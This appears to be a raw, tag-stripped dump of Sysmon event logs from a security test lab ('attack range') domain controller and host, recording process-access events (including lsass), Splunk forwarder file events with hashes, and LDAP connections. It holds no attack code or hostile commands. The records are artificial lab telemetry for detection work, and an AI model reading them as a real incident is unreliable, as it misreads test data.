Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 23542300x800000000000000041486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.650{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=A588A0DEA8DBE2FFFC17D255A5A7AEE0,SHA256=401687C5FE5F016A96454F70EE86C80ECCB9F9B8CB5C05683477FF4556278284,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.322{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45EADEF557A369D1A9C5DEBB81E62131,SHA256=B546EBB655BBC749CA6866E8043F5B61C9911C97D5C5E2ABFE369E479977C9F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.251{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.250{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.193{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.193{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.193{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.180{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016196Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:55.650{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C4DBE7DA165E050134BD2B52D9456DD,SHA256=24C3955888CEE18E3AF07CCC3F53110C9D38FDA889AD287DA80476AD2F6D17FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:55.935{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9C0A541BFEE90E6264195A4A86A1831E,SHA256=3A0F3F710CDA9661ECFE8B571F3B43973110FF84320B192CDCDACE35659E68CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:55.299{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=937777F74FD9D7808800D24417B27E78,SHA256=9CDB426C137E480BC6763CE56C429D343FBB28D88E19C9F51EEE01F270F35D16,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016197Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:56.749{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C6F04B8244166A809D4CC30C4E851EC,SHA256=C4A1851CB3AAC31F27FC4BDE40B8FBCD464095A4CA245CAA3037CE5907A46F73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:56.393{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E2988B79BAD33191C719552BE2B3069,SHA256=1D34A22A0EAAA3052259134CE930352061E5C450689EB1EA46831FF5B58CBBF8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000041512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.317{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56284-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000041511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.317{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56284-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000041510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:53.608{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56283-false10.0.1.12-8000- 23542300x800000000000000016198Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:57.830{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C27A6BFAD49AF9BF4ACFDDA6F270FBFF,SHA256=3C4635001F282E1BE292FB6BB2FD9579F8DD12A2A5E771A6C41C92104FE11B43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:57.379{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C7CDAFC608B33ED2B505BFEB728274A,SHA256=A5DB9E42FB6932F8A2523969D24CB137A8DB0856159C696031811D9E3334EE4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016199Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:58.913{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0AA987101E0BBC1A460041D2D4AC73A,SHA256=481EC9338FCA2882FAC072789352D44EDC463CC9A9357BD209552DF9F37C5919,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:58.479{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7355D67FC4E55090177B78159F25D442,SHA256=9CD3AA713AF566FAE2EA4726A5C4439C223B33B2B75E18E2EDF4A9CEE0F1C136,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:59.579{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B257B181007155009868F5E686505B5,SHA256=5C0EAF9D0722FEB91E5D6DDFE5F6E2AFFAE576496302E2C83FF8B8D0C3FD00D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016200Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:57.019{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50083-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000041518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:00.690{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CC599AD27D236181F9393BCA24554AE,SHA256=837034F2C39D7BDFDB5066B8EC14FE1B9D2D0111FA7EA64ED459B9C91F849641,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016202Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:00.744{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=D4CBED1A7E3AE06E1A6EF765512128F6,SHA256=78626E967503D821E188E55F2C4C5B30126888880664B2E8B08CB861F8AD8CB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016201Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:59.999{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AB8AAB7BDF1CB1A81747D909CB44143,SHA256=6BEC49199658E1323F8AEB6FA229FDC0EF4E71C990F2CA7979125ED771759E48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:00.029{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=DD7680C1C422CEBA3C4D2F48F46F205E,SHA256=967A9E9797B36D6E6039A385B57C92CC52AF2869C31A3F6F18EE1042BDAD8D04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:01.772{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D234456D2D1D28F22588E489002C3456,SHA256=72EB13F913A61BA8FD36D71B30B71191F3192D102CCF89B2029517BEE4FF7E0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016203Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:01.094{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7DE94F40681761DF0C6F4EAC6F3F9FE,SHA256=19624E1A8127CBC2F1F61FD4076E3B71E35E032DBBD1561C01F4A33CFCE737A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:02.866{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A6B2EDA2A5A92D5F16F077B79EB2FE5,SHA256=F651F5A54A0B17B23B297DBEC827C31B4A2189161FD1422C02760157BC3F2FC8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016235Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.828{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016234Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.825{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016233Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.823{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016232Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.813{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016231Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.808{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016230Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.804{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016229Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.803{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016228Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.798{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016227Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.796{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016226Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.793{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program 